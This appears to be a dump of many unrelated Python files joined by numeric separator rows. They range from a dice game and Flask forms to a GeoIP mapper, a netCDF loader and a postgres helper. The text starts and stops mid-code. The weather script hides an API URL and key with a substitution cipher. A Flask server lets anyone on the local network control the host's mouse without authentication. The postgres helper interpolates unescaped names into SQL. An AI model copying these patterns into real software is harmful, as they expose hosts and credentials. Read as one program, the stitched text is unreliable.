        COUNT += 1
    elif roll in ('up', 'u'):
        r.dice_up(r.res)
        COUNT += 1
    elif roll in ('left', 'l'):
        r.dice_left(r.res)
        COUNT += 1
    elif roll in ('right', 'r'):
        r.dice_right(r.res)
        COUNT += 1
    elif roll in ('quit', 'q'):
        # Summarise the session before leaving.
        print('\n')
        print("number of times dices roll: ", COUNT)
        for pos in r.list_all:
            r.dice(pos)  # show every recorded dice position
        print("latest position of dice")
        r.dice(r.res)
        print('Thanks for Participation, Visit Again!!!')
        break
    else:
        print('Invalid move\nPlease Make Correct Choice!!! ')
| 973 | 348 |
from flask import render_template, redirect, url_for, flash, request
from werkzeug.urls import url_parse
from flask_login import login_user, logout_user, current_user
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, DecimalField, BooleanField, SelectField, SubmitField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo
from flask_babel import _, lazy_gettext as _l
from werkzeug.datastructures import MultiDict
from .models.user import User
from .models.messages import *
from flask import Blueprint
bp = Blueprint('updateinformation', __name__)
class UpdateInformationForm(FlaskForm):
    """Profile-edit form; the password field re-confirms the user's identity."""
    firstname = StringField(_l('First Name'), validators=[DataRequired()])
    lastname = StringField(_l('Last Name'), validators=[DataRequired()])
    email = StringField(_l('Email'), validators=[DataRequired(), Email()])
    address = StringField(_l('Address'), validators=[DataRequired()])
    password = PasswordField(_l('Password'), validators=[DataRequired()])
    submit = SubmitField(_l('Update Information'))
@bp.route('/updateInformationPage', methods=['GET', 'POST'])
def updateInformationPage():
    """Render and process the profile-update form for the logged-in user.

    GET pre-fills the form from current_user; POST verifies the password,
    requires at least one changed field, then applies the update.
    """
    unread = num_unread()
    form = UpdateInformationForm()
    if request.method == 'GET':
        # Pre-populate with the user's current data (password left blank).
        # NOTE(review): attribute access on current_user here assumes an
        # authenticated user; an anonymous GET would fail -- confirm routing
        # guards this page.
        form = UpdateInformationForm(formdata = MultiDict({
            'firstname': current_user.firstname,
            'lastname': current_user.lastname,
            'email': current_user.email,
            'address': current_user.address
        }))
    if current_user.is_authenticated:
        if form.validate_on_submit():
            if not(User.get_by_auth(current_user.email, form.password.data)):
                flash('Wrong password!')
            elif form.firstname.data == current_user.firstname and form.lastname.data == current_user.lastname and form.email.data == current_user.email and form.address.data == current_user.address:
                # Nothing changed -- avoid a no-op database write.
                flash('Please change something, or go back to My Account!')
            elif User.update_information(current_user.id,
                                         form.firstname.data,
                                         form.lastname.data,
                                         form.email.data,
                                         form.address.data):
                flash('Your information has been updated!')
                return redirect(url_for('updateinformation.updateInformationPage'))
            else:
                # update_information returning falsy indicates the email is taken.
                flash('This email is already in use.')
    else:
        # Not logged in: send to the product page instead.
        return redirect(url_for('productPage.productPage'))
    return render_template('updateinformation.html', unread=unread,title='Update Information', form=form)
# balance = 0
# if current_user.is_authenticated:
# balance = User.get_balance(current_user.id)
| 2,756 | 717 |
import matplotlib.pyplot as plt
import numpy as np
# Grouped bar chart: salary and age side by side per division.
divisions = ['Admin', 'Development', 'Lead', 'HR']
salary = [10, 14, 20, 12]
age = [28, 30, 45, 32]

index = np.arange(4)  # one slot per division
width = 0.3           # bar width; the two groups sit side by side

plt.bar(index, salary, width, color='green', label='Salary')
plt.bar(index + width, age, width, color='blue', label='Age')
plt.title('Divisions Bar Chart')
plt.xlabel('Divisions')
# BUG FIX: axis-label typo 'NUmber' -> 'Number'.
plt.ylabel('Number')
# Center the tick labels between each pair of bars.
plt.xticks(index + width / 2, divisions)
plt.legend(loc='best')
plt.show()
| 457 | 198 |
from string import *
import json, sys
from urllib.request import urlopen
#parameters
#parameters
# NOTE(review): these strings appear to be an obfuscated request URL / API
# key, decoded at call time via the `decrypt` table below -- confirm before
# changing any character of them.
params1 = "<||^{tss+^=r]^/\A/+|</`[+^r]`;s.+|+s#r&sA/+|</`y_w"
params2 = ':#%:%!,"'
params3 = "-#%&!&')&:-/$,)+-.!:-::-"
params4 = params2 + params3
params_id = "j+^^=.w"
unit = [ "k", "atm"]
# Simple substitution cipher over the printable character set:
# `encrypt` maps printable -> shuffled alphabet, `decrypt` inverts it.
data1 = printable
data2 = punctuation+ascii_uppercase+ascii_lowercase+digits
encrypt = str.maketrans(dict(zip(data1, data2)))
decrypt = str.maketrans(dict(zip(data2, data1)))
#obter função clima
def getWeather(weather):
lin = params1.translate(decrypt)
kim = params4.translate(decrypt)
idm = params_id.translate(decrypt)
link = urlopen(lin + weather + idm + kim).read()
getjson = json.loads(link)
#result = getjson.gets()
print("A previsao do tempo em {}".format(weather),'\n')
main = getjson.get("main", {"temp"})
main2 = getjson.get("main", {"pressure"})
main3 = getjson.get("main", {"humidity"})
main4 = getjson.get("main", {"temp_min"})
main5 = getjson.get("main", {"temp_max"})
main6 = getjson.get("main", {"tomorrow"})
wind = getjson.get("wind", {"speed"})
sys = getjson.get("sys", {"country"})
coord = getjson.get("coord", {"lon"})
coord1 = getjson.get("coord", {"lat"})
weth = getjson.get("weather", {"description"})
# output objects
#print("Description :",weth['description'])
print("Temperatura :",round(main['temp']-273), "deg")
print("Pressao :",main2["pressure"],"atm")
print("Umidade :",main3["humidity"])
print("Velocidade-vento :",wind['speed'],"mph")
print("Max-temp: {}c , Min-temp: {}c".format(round(main5['temp_max']-273),round(main4['temp_min']-273)))
print("Latitude :",coord['lat'])
print("Longitude :",coord['lon'])
print("Pais :",sys['country'])
# Prompt for a city (defaults to "cacule") and report its weather.
ent = input() or "cacule"
try:
    getWeather(ent)
except Exception:
    # BUG FIX: the bare `except:` also swallowed KeyboardInterrupt and
    # SystemExit; catch only ordinary errors (bad city, network failure, ...).
    print("Coloque outra cidade")
finally:
    print("\n")
print("Tschüss / Goodbye / Adeus")
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import pprint
import sys
import time
from twitter.common import app
from twitter.common.recordio import RecordIO, ThriftRecordReader
from apache.thermos.common.ckpt import CheckpointDispatcher
from gen.apache.thermos.ttypes import RunnerCkpt, RunnerState, TaskState
# CLI options for the checkpoint inspector.
app.add_option(
  "--checkpoint",
  dest="ckpt",
  metavar="CKPT",
  help="read checkpoint from CKPT")

# NOTE(review): default=True combined with a string metavar means a value
# supplied on the command line arrives as a *string*, so `assemble is True`
# in main() only holds for the default -- confirm this flag works as intended.
app.add_option(
  "--assemble",
  dest="assemble",
  metavar="CKPT",
  default=True,
  help="whether or not to replay the checkpoint records.")
def main(args):
    """Replay a thermos runner checkpoint stream and pretty-print its state.

    Expects no positional arguments; requires --checkpoint. When --assemble
    is the default, each record is dispatched into an assembled RunnerState.
    """
    values = app.get_options()

    if len(args) > 0:
        print("ERROR: unrecognized arguments: %s\n" % (" ".join(args)), file=sys.stderr)
        app.help()
        sys.exit(1)

    if not values.ckpt:
        print("ERROR: must supply --checkpoint", file=sys.stderr)
        app.help()
        sys.exit(1)

    wrs = RunnerState(processes={})
    dispatcher = CheckpointDispatcher()

    # BUG FIX: `file()` is a Python-2-only builtin and the handle was never
    # closed; open() in a with-block works on both 2 and 3 and always closes.
    with open(values.ckpt, "r") as fp:
        rr = ThriftRecordReader(fp, RunnerCkpt)
        try:
            for wts in rr:
                print('Recovering: %s' % wts)
                if values.assemble is True:
                    dispatcher.dispatch(wrs, wts)
        except RecordIO.Error as err:
            print('Error recovering checkpoint stream: %s' % err, file=sys.stderr)
            return

    print('\n\n\n')

    if values.assemble:
        print('Recovered Task Header')
        pprint.pprint(wrs.header, indent=4)

        print('\nRecovered Task States')
        for task_status in wrs.statuses:
            print(' %s [pid: %d] => %s' % (
                time.asctime(time.localtime(task_status.timestamp_ms / 1000.0)),
                task_status.runner_pid,
                TaskState._VALUES_TO_NAMES[task_status.state]))

        print('\nRecovered Processes')
        pprint.pprint(wrs.processes, indent=4)


app.main()
| 2,309 | 788 |
#!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import unittest
from titus.genpy import PFAEngine
from titus.errors import *
class TestLib1Fixed(unittest.TestCase):
    """PFA `fixed.*` library functions: conversions between fixed and bytes."""

    def testToBytes(self):
        # fixed.toBytes passes the 10-byte fixed content through unchanged.
        engine, = PFAEngine.fromYaml('''
input: {type: fixed, name: Test, size: 10}
output: bytes
action:
  fixed.toBytes: input
''')
        self.assertEqual(engine.action("0123456789"), "0123456789")

    def testFromBytes(self):
        # fixed.fromBytes overwrites `original` from the left with the input
        # bytes: shorter input keeps the original's tail, longer input is
        # truncated to the fixed size (asserted below).
        engine, = PFAEngine.fromYaml('''
input: bytes
output: {type: fixed, name: Test, size: 10}
action:
  - let:
      original:
        type: Test
        value: "0123456789"
  - fixed.fromBytes: [original, input]
''')
        self.assertEqual(list(map(ord, engine.action(""))), [48, 49, 50, 51, 52, 53, 54, 55, 56, 57])
        self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 57])
        self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
        self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
| 1,913 | 779 |
import warnings
import click
from ai.backend.cli.extensions import ExtendedCommandGroup
from ai.backend.client import __version__
from ai.backend.client.output import get_output_handler
from ai.backend.client.config import APIConfig, set_config
from ai.backend.client.cli.types import CLIContext, OutputMode
@click.group(
    cls=ExtendedCommandGroup,
    context_settings={
        'help_option_names': ['-h', '--help'],
    },
)
@click.option('--skip-sslcert-validation',
              help='Skip SSL certificate validation for all API requests.',
              is_flag=True)
@click.option('--output', type=click.Choice(['json', 'console']), default='console',
              help='Set the output style of the command results.')
@click.version_option(version=__version__)
@click.pass_context
def main(ctx: click.Context, skip_sslcert_validation: bool, output: str) -> None:
    """
    Backend.AI command line interface.
    """
    from .announcement import announce

    # Build the API configuration shared by every subcommand.
    api_config = APIConfig(
        skip_sslcert_validation=skip_sslcert_validation,
        announcement_handler=announce,
    )
    set_config(api_config)

    # Attach the selected output handler to the CLI context object.
    selected_mode = OutputMode(output)
    cli_ctx = CLIContext(
        api_config=api_config,
        output_mode=selected_mode,
    )
    cli_ctx.output = get_output_handler(cli_ctx, selected_mode)
    ctx.obj = cli_ctx

    # Route Python warnings through the CLI's pretty printer.
    from .pretty import show_warning
    warnings.showwarning = show_warning
| 1,414 | 415 |
"""
The country module contains the processing_country class.
"""
from os import path
import geoip2.database
from cybercaptain.utils.exceptions import ValidationError
from cybercaptain.processing.base import processing_base
from cybercaptain.utils.jsonFileHandler import json_file_reader, json_file_writer
class processing_country(processing_base):
    """
    The country class allows to map a given IP to an ISO 3166-1 alpha-2 country code and add it to the datasets.
    Please provide a MaxMind GeoLite2-Country DB (.mmdb) yourself via the maxMindDbPath attribute.
    Important: This module will NOT work with a City, Anonymous, ASN, Connection-Type, ... MaxMind database! Only country supported!
    **Parameters**:
        kwargs :
            contains a dictionary of all attributes.
    **Script Attributes**:
        ipInputAttribute:
            a str to where the IP attribute can be found in the given source dataset (dot-separated for nesting).
        outputAttribute:
            a str to where (& which top-level key) output the ISO 3166-1 alpha-2 country code.
        maxMindDbPath:
            a str to where the MaxMind GeoIP database (.mmdb) is located.
    """
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Validate before reading any config so failures surface early.
        self.validate(kwargs)
        # If subclass needs special variables define here
        self.ip_input_attribute = kwargs.get("ipInputAttribute")  # dotted path to the IP inside each record
        self.output_attribute = kwargs.get("outputAttribute")     # top-level key receiving the country code
        self.max_mind_db_path = kwargs.get("maxMindDbPath")       # path to the GeoLite2-Country .mmdb

    def run(self):
        """
        Runs the country-lookup algorithm: streams records from self.src,
        annotates each with a country code ("-99" when unknown), and writes
        the result to self.target.
        **Returns**:
            ``True`` if this run succeeded.
            ``False`` if this run did not succeed.
        """
        self.cc_log("INFO", "Data Processing Country: Started")

        self.cc_log("DEBUG", "Trying to open the MaxMind GeoLite2-Country DB, please wait!")
        try:
            db = geoip2.database.Reader(self.max_mind_db_path)
        except Exception as e:
            self.logger.exception(e)
            self.cc_log("ERROR", "Failed to open the MaxMind GeoLite2-Country DB at %s - please check the file!" % (self.max_mind_db_path))
            return False
        self.cc_log("DEBUG", "Opened the MaxMindGeoLite2-Country DB!")

        json_fr = json_file_reader(self.src)
        json_fw = json_file_writer(self.target)

        self.cc_log("INFO", "Started to lookup ips and write into the target, please wait!")
        while not json_fr.isEOF():
            data = json_fr.readRecord()
            country_code = "-99"  # sentinel for "unknown country"

            # Walk the dotted attribute path down into the record.
            found_ip = data
            for attribute in self.ip_input_attribute.split('.'):
                found_ip = found_ip[attribute]

            # `found_ip == data` detects that the path never narrowed the
            # record (e.g. an empty attribute path).
            if not found_ip or found_ip == data:
                self.cc_log("WARNING", "No IP found at the give ipInputAttribute place - Add country code -99 to this dataset!")
            else:
                # Lookup ip for country
                try:
                    ip_info = db.country(found_ip)
                    if ip_info.country.iso_code: country_code = ip_info.country.iso_code
                    self.cc_log("DEBUG", "Found country code %s for ip %s" % (ip_info.country.iso_code, found_ip))
                except Exception as e:
                    # Lookup failures (unknown/invalid IP) keep the -99 sentinel.
                    self.cc_log("WARNING", "No country code found for ip %s - add -99 to country code" % (found_ip))

            data[self.output_attribute] = country_code
            json_fw.writeRecord(data)

        json_fr.close()
        json_fw.close()
        db.close()
        self.cc_log("INFO", "Data Processing Country: Finished")
        return True

    def validate(self, kwargs):
        """
        Validates all arguments for the country module.
        kwargs(dict): contains a dictionary of all attributes.
        Raises ValidationError for any missing or malformed attribute.
        """
        super().validate(kwargs)
        self.cc_log("INFO", "Data Processing Country: started validation")
        if not kwargs.get("ipInputAttribute"): raise ValidationError(self, ["ipInputAttribute"], "Parameter cannot be empty!")
        if not kwargs.get("outputAttribute"): raise ValidationError(self, ["outputAttribute"] , "Parameters cannot be empty!")
        if "." in kwargs.get("outputAttribute"): raise ValidationError(self, ["outputAttribute"] , "Parameters outputAttribute can not be a nested attribute - please configure a toplevel key!")
        if not kwargs.get("maxMindDbPath"): raise ValidationError(self, ["maxMindDbPath"] , "Parameters cannot be empty!")
        if ".mmdb" not in kwargs.get("maxMindDbPath"): raise ValidationError(self, ["maxMindDbPath"] , "Please only configure MaxMind-DBs for the path (.mmdb)!")
        if not path.isfile(kwargs.get("maxMindDbPath")): raise ValidationError(self, ["maxMindDbPath"] , "Please configure an existing path to an existing MaxMind-DB!")
        self.cc_log("INFO", "Data Processing Country: finished validation")
# Generated by Django 3.0.2 on 2020-01-21 06:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Expose Address.attendees as a many-to-many through persons.AttendeeAddress."""

    dependencies = [
        ('persons', '0010_attendee_address'),
        ('whereabouts', '0008_room'),
    ]

    operations = [
        migrations.AddField(
            model_name='address',
            name='attendees',
            field=models.ManyToManyField(through='persons.AttendeeAddress', to='persons.Attendee'),
        ),
    ]
| 473 | 163 |
# skeleton
class Car:
    """A car with a fuel tank; driving consumes 1/mileage liters per km."""

    def __init__(self, name, mileage, max_fuel):
        self.name = name
        self.mileage = mileage      # km per liter
        self.max_fuel = max_fuel    # tank capacity in liters
        self.fuel = self.max_fuel   # start with a full tank
        self.dist = 0               # total distance driven in km

    def status(self):
        ''' Show the current status of the car
        it should be called after brrr() and gas_statation()
        <<< Template >>>
        Car name: [car name]
        Mileage: [mileage]km/L
        Fuel: [Current fuel]L / [Max fuel]L
        Distance: [Total Distance]km
        if fuel < 20 %, print this:
        "WARNING: remaining fuel is too low"
        '''
        print("Car name: " + self.name)
        print("Mileage: " + str(self.mileage) + "km/L")
        print("Fuel: " + str(self.fuel) + "L" + " / " + str(self.max_fuel) + "L")
        print("Distance: " + str(self.dist) + "km")
        # BUG FIX: the low-fuel warning promised by the docstring was never
        # implemented.
        if self.fuel < 0.2 * self.max_fuel:
            print("WARNING: remaining fuel is too low")

    def brrr(self, km):
        '''
        Drive [km]km:
        - distance increases as you drive
        - fuel decreases as you use
        - if the fuel is empty, you cannot go further (prints "EMPTY!")
        '''
        for _ in range(km):
            if self.fuel > 1 / self.mileage:  # enough fuel for one more km
                self.fuel = self.fuel - 1 / self.mileage
                self.dist = self.dist + 1
            else:
                # BUG FIX: the docstring promised an "EMPTY!" message here.
                print("EMPTY!")
                break
        self.status()

    def gas_station(self):
        '''Refill the tank to capacity and show the status.'''
        self.fuel = self.max_fuel
        self.status()
# Demo run: drive until the tank runs dry, refuel, and repeat.
benz = Car("Benz", 25, 100)
benz.brrr(10000)
benz.gas_station()
benz.brrr(1000)
benz.gas_station()
| 1,411 | 527 |
import socket
import pynput
from gevent import pywsgi
from flask_sockets import Sockets
from flask import Flask, request, render_template
from geventwebsocket.handler import WebSocketHandler
app = Flask(__name__)
sockets = Sockets(app)
mouse = pynput.mouse.Controller()
@app.route("/", methods=['GET', 'POST'])
def index():
    """Serve the touchpad UI page."""
    return render_template("index.html")
@app.route("/mouse/get/", methods=["GET"])
def getMousePosition():
    """Return the current pointer position as "x,y" in integer pixels."""
    pos_x, pos_y = mouse.position
    return "{},{}".format(int(pos_x), int(pos_y))
@sockets.route('/mouse/set/')
def setMouse(ws):
    """WebSocket endpoint: stream "move..."/"scroll..." messages to drive the pointer.

    Coordinates arrive as a "y,x" pair (the client device is used rotated 90°,
    per the startup banner).
    """
    while not ws.closed:
        message = ws.receive()
        if message is not None:
            if message.startswith("move"):
                print("mouse move")
                # NOTE(review): payload is parsed from offset 10 although
                # "move" is 4 characters -- assumes the client pads the
                # command word; confirm against the client protocol.
                xy = message[10:].split(",")
                mouse.position = (float(xy[1]), float(xy[0]))
            if message.startswith("scroll"):
                print("mouse scroll")
                xy = message[10:].split(",")
                mouse.scroll(float(xy[1]), float(xy[0]))
            ws.send("success")
        else:
            print("no receive")
@app.route("/mouse/click/", methods=["GET"])
def clickMouse():
    """Click the left or right button, chosen by the `mouse` query parameter."""
    which = request.args.get("mouse")
    print("mouse click " + which)
    # Anything other than "left" is treated as a right-click.
    button = pynput.mouse.Button.left if which == "left" else pynput.mouse.Button.right
    mouse.click(button)
    return "success"
def getIp():
    """Return this host's LAN IP address.

    Connecting a UDP socket sends no packets; it only selects the local
    interface that would route to 8.8.8.8, which getsockname() then reports.
    """
    # BUG FIX: the socket was never closed (resource leak); a with-block
    # closes it deterministically.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
if __name__ == "__main__":
    # app.run("0.0.0.0", "8000", debug=True)
    # gevent WSGI server with WebSocket support, listening on all interfaces.
    server = pywsgi.WSGIServer(("0.0.0.0", 8000), app, handler_class=WebSocketHandler)
    print("server start at")
    print("http://{}:8000".format(getIp()))
    # Usage banner (Chinese): open this URL from another LAN device to use it
    # as a touchpad; rotate that device 90° clockwise.
    print("请在局域网另一个设备进行访问,可将那个设备作为本设备的触控板")
    print("注意请将设备顺时针旋转90度使用")
    server.serve_forever()
from pathlib import Path
from typing import Tuple
from netCDF4 import Dataset
import xarray
import numpy as np
from datetime import datetime, timedelta
from dateutil.parser import parse
def load(
    fn: Path, tlim: Tuple[datetime, datetime] = None, elevlim: Tuple[float, float] = None
) -> xarray.Dataset:
    """
    This function works with 1983-2010 netCDF3 as well as 2011-present netCDF4 files.

    Loads peak-intensity data into an xarray.Dataset with one variable per
    wavelength channel, dims (time, elevation).

    fn: data file (.nc or .pf); the observation date is parsed from the name.
    tlim: optional (start, end) datetimes (or parseable strings) to subset time.
    elevlim: optional (min, max) elevation angles in degrees to subset elevation.
    """
    fn = Path(fn).expanduser()
    # %% date from filename -- only way
    ext = fn.suffix.lower()
    if ext == ".nc":
        d0 = datetime.strptime(fn.stem[13:21], "%Y%m%d")
    elif ext == ".pf":
        # .pf filenames encode year + day-of-year.
        year = int(fn.stem[4:8])
        days = int(fn.stem[8:11])
        d0 = datetime(year, 1, 1) + timedelta(days=days - 1)
    # NOTE(review): any other extension leaves d0 unbound and fails below
    # with UnboundLocalError -- consider an explicit ValueError.
    with Dataset(fn, "r") as f:
        # %% load by time
        secdayutc = f["Time"][:]
        # convert to datetimes -- need as ndarray for next line
        t = np.array([d0 + timedelta(seconds=int(s)) for s in secdayutc])
        if tlim is not None and len(tlim) == 2:
            if isinstance(tlim[0], str):
                tlim = [parse(t) for t in tlim]
            tind = (tlim[0] <= t) & (t <= tlim[1])
        else:
            tind = slice(None)
        # %% elevation from North horizon
        """
        elevation is not stored anywhere in the data files...
        """
        elv = np.arange(181.0)
        if elevlim is not None and len(elevlim) == 2:
            elind = (elevlim[0] <= elv) & (elv <= elevlim[1])
        else:
            elind = slice(None)
        # %% wavelength channels
        # Stored value scaled by 10 to integer Angstroms (per this conversion).
        wavelen = (f["Wavelength"][:] * 10).astype(int)
        goodwl = wavelen > 1  # some channels are unused in some files
        # %% load the data
        # Analog=f['AnalogData'][tind,:]
        # Ibase=f['BaseIntensity'][tind,goodwl,elind]
        Ipeak = f["PeakIntensity"][tind, :, elind]  # time x wavelength x elevation angle
        if Ipeak.shape[1] != wavelen.size:
            wavelen = wavelen[goodwl]
        # %% root out bad channels 2011-03-01 for example
        # A channel that is zero at every time/elevation is considered dead.
        goodwl &= ~(Ipeak == 0).all(axis=(0, 2))
        wavelen = wavelen[goodwl]
        """
        astype(float) is critical to avoid overflow of int16 dtype!
        """
        Ipeak = f["PeakIntensity"][tind, goodwl, elind].astype(float)
        # %% filter factor per wavelength Rayleigh/PMT * 128
        filtfact = f["FilterFactor"][goodwl]
    # %% assemble output
    R = xarray.Dataset(coords={"time": t[tind], "elevation": elv[elind]})
    for i, w in enumerate(wavelen.astype(str)):
        # Scale intensities by the per-channel filter factor (stored x128).
        R[w] = (("time", "elevation"), Ipeak[:, i, :] * filtfact[i].astype(float) / 128.0)
    return R
| 2,652 | 970 |
# -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import daiquiri
import yaml
LOG = daiquiri.getLogger(__name__)

# Load engine settings at import time; MERGIFYENGINE_SETTINGS names the YAML
# file ("fake.yml" fallback). safe_load avoids arbitrary object construction.
with open(os.getenv("MERGIFYENGINE_SETTINGS", "fake.yml")) as f:
    CONFIG = yaml.safe_load(f.read())

# Expose every config key as a module-level attribute (config.FOO).
globals().update(CONFIG)
def log():
    """Dump the loaded configuration, masking secret values and URL credentials."""
    LOG.info("##################### CONFIGURATION ######################")
    secret_keys = ("PRIVATE_KEY", "WEBHOOK_SECRET", "OAUTH_CLIENT_ID",
                   "OAUTH_CLIENT_SECRET", "MAIN_TOKEN", "FORK_TOKEN")
    for name, value in CONFIG.items():
        if name in secret_keys and value is not None:
            value = "*****"
        if "URL" in name and value is not None:
            # Mask credentials embedded as scheme://user:pass@host.
            value = re.sub(r'://[^@]*@', "://*****@", value)
        LOG.info("* MERGIFYENGINE_%s: %s", name, value)
    LOG.info("##########################################################")
| 1,402 | 468 |
# This implementation as of July 19 2017 has these resource utilizations of the mongodb container:
# - 2 million entries: 1.50 Gb
# - 3 million entries: 2.05 Gb
# The entire docker application was given 6 Gb to use, when given the default 2 Gb,
# the process would frequently crash before 1 million entries were downloaded.
import argparse
import unicodecsv as csv
import pymongo
import tarfile
import sys
import logging
import datetime
from api.web.request import AccessTypeList
from api import config
from api.handlers.reporthandler import AccessLogReport, ACCESS_LOG_FIELDS
# Maps single-letter CLI flags to AccessLogReport parameter names.
ARG_TO_PARAMS= {
    'l': 'limit',
    's': 'start_date',
    'e': 'end_date',
    'u': 'uid',
    'j': 'subject',
    'p': 'project',
    't': 'access_types'
}
def download_large_csv(params):
    """
    Script to download large csv files to avoid uwsgi worker running out of memory.

    Pages through the access log 100k rows at a time, using the last row's
    timestamp as the next page's end_date cursor, appending to accesslog.csv.
    """
    entries = int(params['limit'])  # total rows still wanted
    params['csv'] = "true"
    params['bin'] = "true"
    params['limit'] = "100000"      # page size per report query
    csv_file = open('accesslog.csv', 'w+')
    writer = csv.DictWriter(csv_file, ACCESS_LOG_FIELDS)
    writer.writeheader()
    # NOTE(review): this counter is reported below but never incremented --
    # the unicode-skip handling it describes appears to be missing.
    unicode_err_count = 0
    while entries > 0:
        print "{} entries left".format(entries)
        params['limit'] = str(min(entries, 100000))
        report = AccessLogReport(params)
        rep = report.build()
        # The last row becomes the next page's end_date cursor and is
        # re-fetched, so only rows [:-1] are written here.
        end_date = str(rep[-1]['timestamp'])
        for doc in rep[:-1]:
            entries = entries - 1
            writer.writerow(doc)
        if len(rep) == 1:
            # Exactly one row left overall: write it and stop.
            entries = 0
            writer.writerow(rep[0])
        if len(rep) < int(params['limit']) - 1:
            # Short page => the log is exhausted.
            entries = 0
        csv_file.flush()
        params['end_date'] = end_date
    print "Encountered unicode errors and skipped {} entries".format(unicode_err_count)
    csv_file.close()
def format_arg(args):
    """Translate parsed CLI args to report parameter names, dropping unset values."""
    # Idiom fix: compare against None with `is not`, and iterate items once
    # instead of re-indexing the dict per key.
    return {ARG_TO_PARAMS[arg]: value for arg, value in args.items() if value is not None}
if __name__ == '__main__':
    try:
        # Single-letter flags are mapped to report params by format_arg().
        parser = argparse.ArgumentParser()
        parser.add_argument("-s", help="Start date", type=str)
        parser.add_argument("-e", help="End date", type=str)
        parser.add_argument("-u", help="User id", type=str)
        parser.add_argument("-l", help="Limit", type=str)
        parser.add_argument("-j", help="subJect", type=str)
        parser.add_argument("-p", help="project", type=str)
        parser.add_argument("-t", help="list of access Types", type=str, nargs='+')
        args = vars(parser.parse_args())
        download_large_csv(format_arg(args))
    except Exception as e:
        # Log the full traceback and exit nonzero so callers detect failure.
        logging.exception('Unexpected error in log_csv.py')
        sys.exit(1)
"""Module describes a :class:`DatabaseSource` for local postgres databases."""
import subprocess
from galaxy.util import unicodify
from planemo.io import communicate
from .interface import DatabaseSource
class ExecutesPostgresSqlMixin:
    """Mixin implementing database list/create/drop by shelling out to `psql`."""

    def list_databases(self):
        """Use `psql --list` to generate a list of identifiers."""
        command_builder = self._psql_command_builder("--list")
        stdout = unicodify(self._communicate(command_builder))
        output_lines = stdout.splitlines()
        identifiers = []
        for line in output_lines:
            # First |-separated column of each row is the database name.
            identifiers.append(line.split("|")[0].strip())
        return [i for i in identifiers if i]

    def create_database(self, identifier):
        """Use `psql -c "create database"` to create a database."""
        # NOTE(review): identifier is interpolated into SQL unescaped --
        # callers must supply a trusted/validated database name.
        sql = "create database %s;" % identifier
        self._run_sql_command(sql)

    def delete_database(self, identifier):
        """Use `psql -c "drop database"` to delete a database."""
        # NOTE(review): same unescaped interpolation as create_database.
        sql = "drop database %s;" % identifier
        self._run_sql_command(sql)

    def _run_sql_command(self, sql):
        # communicate is just joining commands so we need to modify the
        # sql as an argument - it shouldn't do this.
        sql_arg = '%s' % sql
        command_builder = self._psql_command_builder("--command", sql_arg)
        self._communicate(command_builder)

    def _communicate(self, command_builder):
        """Run the assembled command and return its captured stdout."""
        stdout, _ = communicate(
            command_builder.command,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        return stdout
class LocalPostgresDatabaseSource(ExecutesPostgresSqlMixin, DatabaseSource):
    """Local postgres database source managed through psql application."""

    def __init__(self, **kwds):
        """Construct a postgres database source from planemo configuration."""
        self.psql_path = kwds.get("postgres_psql_path", None) or 'psql'
        self.database_user = kwds.get("postgres_database_user", None)
        self.database_host = kwds.get("postgres_database_host", None)
        self.database_port = kwds.get("postgres_database_port", None)
        self._kwds = kwds

    def sqlalchemy_url(self, identifier):
        """Return a URL of the form postgresql://username@host[:port]/identifier."""
        host_part = self.database_host or "localhost"
        if self.database_port:
            host_part = "%s:%s" % (host_part, self.database_port)
        return "postgresql://%s@%s/%s" % (self.database_user, host_part, identifier)

    def _psql_command_builder(self, *args):
        """Assemble a psql invocation: connection flags plus the given args."""
        builder = _CommandBuilder(self.psql_path)
        # Print only tuples so output is easier to parse.
        builder.append_command("--tuples-only")
        # Connection flags are added only when configured.
        for flag, value in (("--username", self.database_user),
                            ("--host", self.database_host),
                            ("--port", self.database_port)):
            if value:
                builder.append_command(flag, value)
        builder.append_command("-P", "pager=off")
        builder.extend_command(args)
        return builder
class _CommandBuilder(object):
def __init__(self, *args):
self.command = list(args)
def append_command(self, *args_or_none):
args_or_none = args_or_none or []
for arg_or_none in args_or_none:
if arg_or_none is not None:
self.command.append(arg_or_none)
def extend_command(self, args):
for arg in (args or []):
self.append_command(arg)
__all__ = (
